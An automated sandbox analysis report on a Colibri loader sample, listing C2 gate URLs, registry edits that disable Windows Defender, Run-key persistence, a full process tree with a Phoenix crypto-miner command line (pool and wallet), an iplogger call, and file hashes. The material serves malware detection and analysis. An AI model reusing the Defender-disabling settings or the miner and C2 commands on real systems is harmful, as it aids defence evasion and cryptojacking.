colibri | 99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a

Analysis

max time kernel
81s
max time network
144s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
01-09-2022 14:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe
Size

602KB
MD5

a5bbcfa88a2e99448d75af25c2aac091
SHA1

3f5a11daf693568bbff848cfc8ebf9be60cd3138
SHA256

99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a
SHA512

71e41b7b09a4b0d358fb4d94d0e0d99b0becaadbff70eba1d03e0ba9c4780616e755e8893a9bd90d519297d0443788cb52a3f5f2725a68e160e9b0dafbaed4df
SSDEEP

6144:ypMbah3V7h34ww3D5UIiJf0lo+u8rjXIn4XxTlIOQF:yrhEiIkBD8rTInuxTeOA

Score

10^/10

colibri build1 evasion loader miner persistence trojan

Malware Config

Extracted

Family

colibri

Version

1.2.0

Botnet

Build1

http://zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc/gate.php

http://yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx/gate.php

Signatures

Colibri Loader
A loader sold as MaaS first seen in August 2021.
loader colibri

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

F2LMCD2IKD33BI0.exeKGCFM76C36L005D.exe0KJ66DLG1F8BF66.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	F2LMCD2IKD33BI0.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	F2LMCD2IKD33BI0.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	F2LMCD2IKD33BI0.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	F2LMCD2IKD33BI0.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	KGCFM76C36L005D.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	KGCFM76C36L005D.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	0KJ66DLG1F8BF66.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	KGCFM76C36L005D.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	0KJ66DLG1F8BF66.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	0KJ66DLG1F8BF66.exe

Detectes Phoenix Miner Payload 2 IoCs

miner

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\MSEdge\svchost.exe	miner_phoenix
C:\Users\Admin\AppData\Roaming\MSEdge\svchost.exe	miner_phoenix

Downloads MZ/PE file

Executes dropped EXE 9 IoCs

Processes:

conhost.execonhost.exemsedge.exesvchost.exeF2LMCD2IKD33BI0.exeKGCFM76C36L005D.exe0KJ66DLG1F8BF66.exeBHA4536KG11LFDM.exeCBA0862A799F4GI.exe

pid	process
228	conhost.exe
4208	conhost.exe
2832	msedge.exe
3636	svchost.exe
5084	F2LMCD2IKD33BI0.exe
4444	KGCFM76C36L005D.exe
1560	0KJ66DLG1F8BF66.exe
4808	BHA4536KG11LFDM.exe
672	CBA0862A799F4GI.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

BHA4536KG11LFDM.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	BHA4536KG11LFDM.exe

Loads dropped DLL 4 IoCs

Processes:

rundll32.exerundll32.exe

pid process

3056 rundll32.exe
3056 rundll32.exe
1312 rundll32.exe
1312 rundll32.exe

pid	process
3056	rundll32.exe
3056	rundll32.exe
1312	rundll32.exe
1312	rundll32.exe

Windows security modification 2 TTPs 3 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

F2LMCD2IKD33BI0.exeKGCFM76C36L005D.exe0KJ66DLG1F8BF66.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	F2LMCD2IKD33BI0.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	KGCFM76C36L005D.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	0KJ66DLG1F8BF66.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MSEdge = "C:\\Users\\Admin\\AppData\\Roaming\\MSEdge\\msedge.exe"	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows\CurrentVersion\Run	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

svchost.exe

pid process

3636 svchost.exe
3636 svchost.exe

pid	process
3636	svchost.exe
3636	svchost.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.execonhost.exe99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe

description	pid	process	target process
PID 1336 set thread context of 2800	1336	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe
PID 228 set thread context of 4208	228	conhost.exe	conhost.exe
PID 2800 set thread context of 1388	2800	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

Processes:

CBA0862A799F4GI.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	CBA0862A799F4GI.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\IESettingSync	CBA0862A799F4GI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	CBA0862A799F4GI.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	CBA0862A799F4GI.exe

Modifies registry class 1 IoCs

Processes:

BHA4536KG11LFDM.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings BHA4536KG11LFDM.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

4504 powershell.exe
4504 powershell.exe
1848 powershell.exe
1848 powershell.exe
4940 powershell.exe
4940 powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings	BHA4536KG11LFDM.exe

pid	process
4504	powershell.exe
4504	powershell.exe
1848	powershell.exe
1848	powershell.exe
4940	powershell.exe
4940	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

F2LMCD2IKD33BI0.exepowershell.exeKGCFM76C36L005D.exe0KJ66DLG1F8BF66.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	5084	F2LMCD2IKD33BI0.exe
Token: SeDebugPrivilege	4504	powershell.exe
Token: SeDebugPrivilege	4444	KGCFM76C36L005D.exe
Token: SeDebugPrivilege	1560	0KJ66DLG1F8BF66.exe
Token: SeDebugPrivilege	1848	powershell.exe
Token: SeDebugPrivilege	4940	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

CBA0862A799F4GI.exe

pid process

672 CBA0862A799F4GI.exe
672 CBA0862A799F4GI.exe

pid	process
672	CBA0862A799F4GI.exe
672	CBA0862A799F4GI.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.execonhost.exe99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.execmd.exemsedge.exeF2LMCD2IKD33BI0.exeKGCFM76C36L005D.exe0KJ66DLG1F8BF66.exeBHA4536KG11LFDM.execontrol.exerundll32.exeRunDll32.exe

description	pid	process	target process
PID 1336 wrote to memory of 228	1336	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe	conhost.exe
PID 1336 wrote to memory of 228	1336	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe	conhost.exe
PID 1336 wrote to memory of 228	1336	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe	conhost.exe
PID 228 wrote to memory of 4208	228	conhost.exe	conhost.exe
PID 228 wrote to memory of 4208	228	conhost.exe	conhost.exe
PID 228 wrote to memory of 4208	228	conhost.exe	conhost.exe
PID 1336 wrote to memory of 2800	1336	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe
PID 1336 wrote to memory of 2800	1336	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe
PID 1336 wrote to memory of 2800	1336	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe
PID 1336 wrote to memory of 2800	1336	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe
PID 1336 wrote to memory of 2800	1336	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe
PID 1336 wrote to memory of 2800	1336	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe
PID 1336 wrote to memory of 2800	1336	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe
PID 1336 wrote to memory of 2800	1336	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe
PID 1336 wrote to memory of 2800	1336	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe
PID 1336 wrote to memory of 2800	1336	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe
PID 228 wrote to memory of 4208	228	conhost.exe	conhost.exe
PID 228 wrote to memory of 4208	228	conhost.exe	conhost.exe
PID 228 wrote to memory of 4208	228	conhost.exe	conhost.exe
PID 228 wrote to memory of 4208	228	conhost.exe	conhost.exe
PID 2800 wrote to memory of 1388	2800	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe
PID 2800 wrote to memory of 1388	2800	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe
PID 2800 wrote to memory of 1388	2800	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe
PID 2800 wrote to memory of 1388	2800	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe
PID 2800 wrote to memory of 1388	2800	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe
PID 2800 wrote to memory of 1388	2800	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe
PID 2800 wrote to memory of 1388	2800	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe
PID 2800 wrote to memory of 1388	2800	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe
PID 2800 wrote to memory of 1388	2800	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe
PID 1388 wrote to memory of 3152	1388	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe	cmd.exe
PID 1388 wrote to memory of 3152	1388	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe	cmd.exe
PID 1388 wrote to memory of 3152	1388	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe	cmd.exe
PID 3152 wrote to memory of 2832	3152	cmd.exe	msedge.exe
PID 3152 wrote to memory of 2832	3152	cmd.exe	msedge.exe
PID 2832 wrote to memory of 3636	2832	msedge.exe	svchost.exe
PID 2832 wrote to memory of 3636	2832	msedge.exe	svchost.exe
PID 1388 wrote to memory of 5084	1388	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe	F2LMCD2IKD33BI0.exe
PID 1388 wrote to memory of 5084	1388	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe	F2LMCD2IKD33BI0.exe
PID 5084 wrote to memory of 4504	5084	F2LMCD2IKD33BI0.exe	powershell.exe
PID 5084 wrote to memory of 4504	5084	F2LMCD2IKD33BI0.exe	powershell.exe
PID 1388 wrote to memory of 4444	1388	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe	KGCFM76C36L005D.exe
PID 1388 wrote to memory of 4444	1388	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe	KGCFM76C36L005D.exe
PID 1388 wrote to memory of 1560	1388	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe	0KJ66DLG1F8BF66.exe
PID 1388 wrote to memory of 1560	1388	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe	0KJ66DLG1F8BF66.exe
PID 4444 wrote to memory of 1848	4444	KGCFM76C36L005D.exe	powershell.exe
PID 4444 wrote to memory of 1848	4444	KGCFM76C36L005D.exe	powershell.exe
PID 1560 wrote to memory of 4940	1560	0KJ66DLG1F8BF66.exe	powershell.exe
PID 1560 wrote to memory of 4940	1560	0KJ66DLG1F8BF66.exe	powershell.exe
PID 1388 wrote to memory of 4808	1388	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe	BHA4536KG11LFDM.exe
PID 1388 wrote to memory of 4808	1388	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe	BHA4536KG11LFDM.exe
PID 1388 wrote to memory of 4808	1388	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe	BHA4536KG11LFDM.exe
PID 1388 wrote to memory of 672	1388	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe	CBA0862A799F4GI.exe
PID 1388 wrote to memory of 672	1388	99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe	CBA0862A799F4GI.exe
PID 4808 wrote to memory of 368	4808	BHA4536KG11LFDM.exe	control.exe
PID 4808 wrote to memory of 368	4808	BHA4536KG11LFDM.exe	control.exe
PID 4808 wrote to memory of 368	4808	BHA4536KG11LFDM.exe	control.exe
PID 368 wrote to memory of 3056	368	control.exe	rundll32.exe
PID 368 wrote to memory of 3056	368	control.exe	rundll32.exe
PID 368 wrote to memory of 3056	368	control.exe	rundll32.exe
PID 3056 wrote to memory of 4260	3056	rundll32.exe	RunDll32.exe
PID 3056 wrote to memory of 4260	3056	rundll32.exe	RunDll32.exe
PID 4260 wrote to memory of 1312	4260	RunDll32.exe	rundll32.exe
PID 4260 wrote to memory of 1312	4260	RunDll32.exe	rundll32.exe
PID 4260 wrote to memory of 1312	4260	RunDll32.exe	rundll32.exe

C:\Users\Admin\AppData\Local\Temp\99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe
"C:\Users\Admin\AppData\Local\Temp\99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1336

C:\ProgramData\conhost.exe
"C:\ProgramData\conhost.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:228

C:\ProgramData\conhost.exe
"C:\ProgramData\conhost.exe"
3⤵
- Executes dropped EXE
PID:4208

C:\Users\Admin\AppData\Local\Temp\99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe
"C:\Users\Admin\AppData\Local\Temp\99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2800

C:\Users\Admin\AppData\Local\Temp\99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe
"C:\Users\Admin\AppData\Local\Temp\99f38cc25d3cbea909717f9412ecd960de03c382e205c687ff9b6d27a2938c7a.exe"
3⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1388

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Roaming\MSEdge\msedge.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:3152

C:\Users\Admin\AppData\Roaming\MSEdge\msedge.exe
C:\Users\Admin\AppData\Roaming\MSEdge\msedge.exe
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2832

C:\Users\Admin\AppData\Roaming\MSEdge\svchost.exe
-pool us-eth.2miners.com:2020 -wal 0x298a98736156cdffdfaf4580afc4966904f1e12e -worker ferma -epsw x -mode 1 -log 0 -mport 0 -etha 0 -ftime 55 -retrydelay 1 -coin eth
6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3636

C:\Users\Admin\AppData\Local\Temp\F2LMCD2IKD33BI0.exe
"C:\Users\Admin\AppData\Local\Temp\F2LMCD2IKD33BI0.exe"
4⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5084

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4504

C:\Users\Admin\AppData\Local\Temp\KGCFM76C36L005D.exe
"C:\Users\Admin\AppData\Local\Temp\KGCFM76C36L005D.exe"
4⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4444

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1848

C:\Users\Admin\AppData\Local\Temp\0KJ66DLG1F8BF66.exe
"C:\Users\Admin\AppData\Local\Temp\0KJ66DLG1F8BF66.exe"
4⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1560

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4940

C:\Users\Admin\AppData\Local\Temp\BHA4536KG11LFDM.exe
"C:\Users\Admin\AppData\Local\Temp\BHA4536KG11LFDM.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4808

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\GVWP.CPL",
5⤵
- Suspicious use of WriteProcessMemory
PID:368

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\GVWP.CPL",
6⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3056

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\GVWP.CPL",
7⤵
- Suspicious use of WriteProcessMemory
PID:4260

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\GVWP.CPL",
8⤵
- Loads dropped DLL
PID:1312

C:\Users\Admin\AppData\Local\Temp\CBA0862A799F4GI.exe
https://iplogger.org/1y8ns7
4⤵
- Executes dropped EXE
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:672

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\conhost.exe
Filesize
75KB

MD5
e0a68b98992c1699876f818a22b5b907

SHA1
d41e8ad8ba51217eb0340f8f69629ccb474484d0

SHA256
2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f

SHA512
856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

Download Submit
C:\ProgramData\conhost.exe
Filesize
75KB

MD5
e0a68b98992c1699876f818a22b5b907

SHA1
d41e8ad8ba51217eb0340f8f69629ccb474484d0

SHA256
2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f

SHA512
856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

Download Submit
C:\ProgramData\conhost.exe
Filesize
75KB

MD5
e0a68b98992c1699876f818a22b5b907

SHA1
d41e8ad8ba51217eb0340f8f69629ccb474484d0

SHA256
2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f

SHA512
856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
5f0ddc7f3691c81ee14d17b419ba220d

SHA1
f0ef5fde8bab9d17c0b47137e014c91be888ee53

SHA256
a31805264b8b13ce4145f272cb2830728c186c46e314b48514d636866217add5

SHA512
2ce7c2a0833f581297c13dd88ccfcd36bf129d2b5d7718c52b1d67c97cbd8fc93abc085a040229a0fd712e880c690de7f6b996b0b47c46a091fabb7931be58d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
e3b6cc0fbea08a0831f0026a696db8b8

SHA1
4e32202d4700061cfd80d55e42798131c9f530d4

SHA256
3284cae7b82be99d93064390ba071ba4321f3f24dd21515b37b2ca9f31b2e8d5

SHA512
6a06856f360b48c8bc8a15ffb8d7a6604ec357bcb1d0fad5d71a2cb876929a7b67eb40ba4493998ab1bbae8cb71212e124276f27d5c138a135041c27a41a0b7a

Download Submit
C:\Users\Admin\AppData\Local\Temp\0KJ66DLG1F8BF66.exe
Filesize
317KB

MD5
6c4d300e33e8440e6b517521c25be22a

SHA1
7378282660c07121867d80c6be1497ccba3aa962

SHA256
e295a53ac9c9ad5bc5d4c5f9487700c22a0a4d7a26e69d693f70f69e8c6e15ae

SHA512
52f841b5eebebb40cfa6c46022ca161b906d1e513381ec5977819cbf80a6d87c6f7ee4f47038c88af506bcd0e46c25fee814fe4e316963d9304bf7b3d2aad323

Download Submit
C:\Users\Admin\AppData\Local\Temp\0KJ66DLG1F8BF66.exe
Filesize
317KB

MD5
6c4d300e33e8440e6b517521c25be22a

SHA1
7378282660c07121867d80c6be1497ccba3aa962

SHA256
e295a53ac9c9ad5bc5d4c5f9487700c22a0a4d7a26e69d693f70f69e8c6e15ae

SHA512
52f841b5eebebb40cfa6c46022ca161b906d1e513381ec5977819cbf80a6d87c6f7ee4f47038c88af506bcd0e46c25fee814fe4e316963d9304bf7b3d2aad323

Download Submit
C:\Users\Admin\AppData\Local\Temp\BHA4536KG11LFDM.exe
Filesize
1.3MB

MD5
b197154971461163a41fb822552d465c

SHA1
9b4f70797a6176c38d78e208bc12cf849b59638c

SHA256
e40a2ef3428c29f6373dd18d106eba845193d756dc832a8748b22e049ac48ced

SHA512
f8d31509afe2a9e6ec10252edd7a71ec397ec8f07d39bbf8abb43dc4a595e8180d32e041dc2735af4070c770314d6d9bb3bf4d6ccf7f35e800e5fcece4efdca4

Download Submit
C:\Users\Admin\AppData\Local\Temp\BHA4536KG11LFDM.exe
Filesize
1.3MB

MD5
b197154971461163a41fb822552d465c

SHA1
9b4f70797a6176c38d78e208bc12cf849b59638c

SHA256
e40a2ef3428c29f6373dd18d106eba845193d756dc832a8748b22e049ac48ced

SHA512
f8d31509afe2a9e6ec10252edd7a71ec397ec8f07d39bbf8abb43dc4a595e8180d32e041dc2735af4070c770314d6d9bb3bf4d6ccf7f35e800e5fcece4efdca4

Download Submit
C:\Users\Admin\AppData\Local\Temp\CBA0862A799F4GI.exe
Filesize
8KB

MD5
8719ce641e7c777ac1b0eaec7b5fa7c7

SHA1
c04de52cb511480cc7d00d67f1d9e17b02d6406b

SHA256
6283ac6ecbf4c4038cf44896dd221c7c11152bac77273709330409032c3e72ea

SHA512
7be5bd6d2342dd02818f1979e7e74a6376658711ac82a59b2af1a67207cfd3c7416b657af01216473b15132e4aa5c6675f0eb8ee6343192c7dfc4a5249ccaa97

Download Submit
C:\Users\Admin\AppData\Local\Temp\CBA0862A799F4GI.exe
Filesize
8KB

MD5
8719ce641e7c777ac1b0eaec7b5fa7c7

SHA1
c04de52cb511480cc7d00d67f1d9e17b02d6406b

SHA256
